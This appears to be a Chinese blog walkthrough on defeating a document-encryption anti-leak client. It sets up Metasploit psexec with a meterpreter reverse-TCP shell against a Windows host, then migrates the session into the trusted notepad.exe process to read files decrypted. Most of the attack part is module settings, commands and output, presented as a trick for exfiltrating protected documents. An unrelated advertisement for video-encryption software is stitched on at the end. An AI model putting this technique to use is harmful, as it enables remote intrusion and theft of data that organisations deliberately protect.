使用Metasploit进程注入绕过文档加密限制

背景:
先介绍下文档加密的工作机制,文档加密的主要作用是防泄密,安装了加密客户端的计算机,根据策略会自动加密相关类型的文件,并只允许合法程序打开,并且对该加密文件进行的任何操作(修改、另存、复制等),最终都会依然加密。而用非法程序(策略外的程序)打开都只会是密文乱码。当然,在没有安装该加密客户端的计算机上用任何程序也是密文乱码。
在这里插入图片描述
分析:
在了解了它的工作机制后,我开始设想,既然合法程序可以解密,那么假如将另一个伪程序注入到这个合法程序的进程中,那么这个伪程序是否就可以解密文件,然后再用伪程序对文件进行操作。最好这个伪程序还不在这个安装有加密客户端的操作系统上。要实现这种效果,我第一时间想到了大名鼎鼎的Metasploit。

骚操作:
我用的是exploit/windows/smb/psexec模块,虽然我是64位的WIN7但是Payload选的是windows/meterpreter/reverse_tcp。根据个人经验windows x64/meterpreter/reverse_tcp位的Payload经常会出现命令执行失败的情况。基本配置如下:

msf5 exploit(windows/smb/psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.8.15     yes       The target address range or CIDR identifier
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               xxxxxxxxxx       no        The password for the specified username
   SMBUser               administrator    no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.8.13     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

进程未注入前用cat打开加密文件是乱码,如下:

meterpreter > cat test.txt
b#eflE-SafeNetLOCK)FST0gWnm¶79񅼶ªֆm˯Р<½.̬򆤬³ê6±P <h򀄰Տˮi¬¢򽓕B񯍀콎󎫹º®{#Ā¨<
n񬤴erpreter > 

查看进程,找到合法进程notepad.exe的PID:
在这里插入图片描述
将会话注入到合法进程notepad.exe中:

meterpreter > cd C:\\Users\\Administrator\\Desktop
meterpreter > migrate 1884
[*] Migrating from 788 to 1884...
[*] Migration completed successfully.

再次用cat打开,发现已经成功解密:

meterpreter > cat test.txt 
Test by Donvin Li.
This is an encrypted file that can only be opened using Notepad.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxtestxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

接下来,直接将结果输出重定向到文件中即可。至此,成功绕过文档加密的限制。

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于新一代多媒体加密技术,更高安全性、支持win7(32,64)WIN8(32,64); 支持各种视频的高速编码加密与高速解码播放; 可以加密各种视频音频格式文件(wmv, avi, asf, mpg, rm, rmvb, mp4, flv, mp3, vob, mov, mkv, mpeg, dat等等其他各种音频视频格式); 加密后的文件可以通过离线方式授权播放,也可以通过网络方式授权播放; 只需要加密一次,就可以实现一机一码授权播放; V2017S版重要更新: 1、正式版增加了自定义播放器图标功能,个性化图标和个性化界面可以显著提升企业形象; 2、正式版增加了默认水印功能,无需设置播放密码就可以给视频添加水印; 3、正式版采用更高强度加密内核,让所有形式的翻版方式都失效; 4、正式版采用更高强度播放密码算法,让所有形式的偷换机器码播放方式均失效; 5、正式版金盾2017S防翻录又增利器,新增播放窗口位移功能,播放过程中播放窗口会按你指定的时间移动变换位置, 让任何翻录软件都无可奈何,如果是全屏播放会自动退出全屏再换位置; V2017版重要更新: 1、播放器开启速度大幅度提高; 2、新增U盘和移动硬盘召回功能; 3、增加文件关联功能,加密后的视频可以自动关联到播放器,双击视频即可打开; 4、可以自定义个性化认证界面图,专业的认证界面可以显著提升企业形象; 5、新增自毁功能,加密后的视频检测到破解可以自毁,此功能可以抵御市面上所有破解方式; 6、新增天狼加密内核,此加密措施从未被破解过,金盾高级武器库又增利器; 7、新增防翻录问答功能,对试图翻录你视频的人是一个噩梦! 金盾2016SS重要更新: 1、新增扭曲变换加密算法,加密算法增加至4种,加密算法混用可以达到奇效; 2、新增加密强度分级显示; 3、改进RSA加密算法; 4、新增内存保护功能; V2016版重要更新: 1、加密视频可以设置保留原始格式,也可以自定义格式,加密后的视频杀毒软件永不误报 ! 2、单个视频支持无穷大,逐帧加密加密后的视频可以在1秒钟左右打开播放,边解密边播放; 3、有两种加密算法可以选择,几乎可以加密所有常见或不常见的视频格式; 4、加密后的视频可以采用各种灵活调用方式,可以命令行调用播放、插件方式调用播放[定制]、双击播放等等; 5、非对称加密算法采用国际上最高强度加密算法,技术上领先国内和国外其他软件整整两代,可谓视频加密领域的第五代战机! 6、可启用高清播放,图像放大播放边缘依然平滑,不产生锯齿,颜色不失真; 7、酷炫视频水印功能,真正透明水印,可以设置水印颜色、大小、旋转角度、浮动范围;防翻录水印可以设置透明度,不影响用户播放! 8、快进播放不影响音质,快进播放时声音依然是高保真原声效果; 9、播放过程中可以切换硬件加速,降低CPU使用率; 10、可以自动绑定用户第一次播放的电脑,无需用户机器码! 11、灵活的绑定选项,加密视频可以绑定主板、硬盘,显卡、网卡、U盘、加密狗等; 12、灵活的试播文件制作功能; 13、灵活的业务接口,可以结合网站、结合网银、结合支付宝,淘宝、结合Discuz! 论坛; 14、加密后的视频无法用OD等破解调试工具加载; 15、增加了配置保存功能,可以保存多种配置; 16、增加了播放授权导入和导出功能; 17、增加了已授权播放密码日志记录功能; 18、播放器界面做了重大美化设计,整个界面美观大方; 19、增加了播放菜单功能,播放时可以右键显示功能菜单; 20、可以在播放时设置显示或隐藏播放控制条; 21、重大安全性升级; 22、其他各种小改进
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值